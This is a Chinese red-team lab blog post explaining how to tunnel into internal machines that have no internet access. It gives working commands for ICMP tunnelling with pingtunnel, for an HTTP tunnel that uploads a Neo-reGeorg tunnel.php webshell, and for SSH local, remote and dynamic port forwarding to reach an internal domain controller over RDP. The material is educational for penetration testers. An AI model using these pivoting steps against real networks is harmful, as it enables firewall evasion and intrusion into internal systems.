红队笔记Day3-->隧道上线不出网机器

昨天讲了通过代理的形式(端口转发)实现了上线不出网的机器,那么今天就来讲一下如何通过隧道上线不出网机器

    

目录

1.网络拓扑

2.开始做隧道?No!!!

3.icmp隧道

4.HTTP隧道

5.SSH隧道

1.什么是ssh隧道

2.ssh隧道:端口转发

3.SSH远程端口转发

4.ssh动态端口转发


1.网络拓扑

今天我youyouyouyouyoyoyo又配环境配到崩溃了,是的,配环境已经给我整麻了(kali的网卡那里感觉有点问题,怎么配都配不好)所以我知难而退,改换桥接!!

 大概是这样的一个网络拓扑

2.开始做隧道?No!!!

第一部肯定不是做隧道啊!,你连防火墙给你通过什么流量都不知道,做啥隧道,做了流量也过不去,所以!!正确的第一步,是通过对应的流量探测去制定隧道的种类!!!

3.icmp隧道

所谓的icmp隧道就是:将数据包夹带在icmp的数据包中,其中,ICMP 隧道几乎在所有的网络环境中都是被允许的,因此攻击者可以通过 ICMP 隧道绕过一些网络安全设备。

但是!!!这个程序似乎在一些低版本的Windows上运行不了(缺少一些系统动态链接库文件)

虽然win11可以(但是很多内网的环境都是用的win7 winserver这种的)所以适用范围较窄感觉

即便是这样,那也还是要将草走复现一下的!😭😭😭

先是kali上的命令

sysctl -w net.ipv4.icmp_echo_ignore_all=1  //用于禁用本机对icmp流量的应答

然后再win7靶机上运行

pingtunnel.exe -type server -noprint 1 -nolog 1

然后kali上运行以下命令,意思就是将本机的8888作为scok5的连接端接口

bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1

最后就在kali上修改一个配置文件

vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可

 就可以远程连接了

proxychains rdesktop 192.168.52.138

4.HTTP隧道

这个比较常见,我们经常都是通过一个web漏洞去getshell的,所以防火墙一般不会限制http流量

HTTP隧道有特别特别多,今天来分享一个加密隧道穿透 Neoreg-reGeorg

下载连接 :项目概览 - Neo-reGeorg - GitCode

开整,先再摆一下网络拓扑,以免忘记

先在kali上运行,k后面可以跟上你自己的密码

python neoreg.py -k "你的密码"

然后判断网站的语言,我这个win7上搭建的是php的网站

我们在执行完kali的命令之后会生成一个文件夹

       --->       

选择对应的网站语言扔上去 (我这里扔的是tunnel.php)可以看见能成功访问

于是就在kali上执行这个命令,意思就是开本地的8888端口来连接远程的php文件

python neoreg.py -k "你的密码" -u http://192.168.3.58/tunnel.php  -p 8888

这就可以了???,肯定不是啊,你还没开socks5的本地代理端口,咳咳咳,差点忘记说了

这个工具建立的是socks5代理,所以你就开启对应的代理端口

vim /ect/proxychains4.conf

 在这个文件的最底端加上这个指令 socks5 127.0.0.1 8888

然后就可以连接啦!!!!     

proxychains rdesktop 192.168.52.138 //这个可以直接写内网的地址!!!

 这样就能成功连接上去了!!!!嘿嘿嘿

 当然了,http隧道可不止这一种,tunna abptts pivotnaacci 这些都是http的隧道,就不多枚举了

5.SSH隧道

众所周知,在实战中一般服务器都是的Linux_like的,于是小编就去下载了一个Ubuntu来玩一下

是时候该更新网络拓扑啦

     于是这样我们就有了一台新的Linux服务器,可以搞事情了

直接访问它的网站根目录下的文件hhhh~~~

  

1.什么是ssh隧道

在实际中,大部分的Linux服务器都支持ssh协议,内网中的主机和设备以及边界的防火墙都允许ssh流量通过,但是!!!ssh除了可以远程连接,还可以转发流量,并且是加密转发,进而突破防火墙限制

2.ssh隧道:端口转发

首先确定Ubuntu的22端口开放,以及知道它的账号密码 ,就可以在kali进行以下操作

ssh -L 8887 192.168.52.138:3389 whoami@192.168.3.61 -p 22

这个的意思就是

  • kali先通过连接Ubuntu服务器
  • 又因为Ubuntu可以和内网通信, -L 意思为将靶机的3389端口的流量准发到攻击机的8887端口
  • 当kali访问本地的8887就等于在访问内网DC的3389端口

这样就可以同时连接上两台服务器!!!

3.SSH远程端口转发

这个和本地端口转发有点类似不过要先获取它的root权限,这个Linux不用于Linux

蚁剑是无法执行ssh的,而且上线cs有点困难我不会,于是就要在ubuntu上面敲这个代码

ssh -R 8887:192.168.52.138:3389 kali@192.168.3.57 -p 22

前提是你的攻击机器kali开启22端口!!可以这样查看

sudo systemctl status ssh 

没开启的话开启就好

sudo systemctl start ssh

然后在你的Ubuntu上面输入kali的密码就能成功连接了

但是,在你连接上了内网DC的时候,Ubuntu也是连接上了你的kali

如果你的虚拟机配置不当,或者说别的大佬有0day,是可以造成虚拟机越狱的,那到时候你就惨了

4.ssh动态端口转发

所谓的动态端口转发就是建立起一个ssh加密的socks4/5的代理隧道,我们需要在kali运行以下命令

ssh -D 8888 whoami@192.168.3.61 

然后就能连接上Ubuntu了,其中的 -D意为建立socks5隧道流量走8888端口,去连接ubutu的22端口

当然了,以上能成功,是在socks5代理成功配置的情况下噢

满足上述条件,就能实现内网穿透了,远程上线成功!!!!

以上,就是多种的协议对应的一些隧道!!当然还有很多,像DNS ,RDP ,IPV6都是有对应隧道的,这里我就不枚举了!!

 明天讲什么呢?? 讲隧道穿透利用方法, 多层代理,反正向代理,多级代理,节点加密,节点穿透,对应工具部署!!!! Byd我都期待起来了!! 

    

  • 39
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值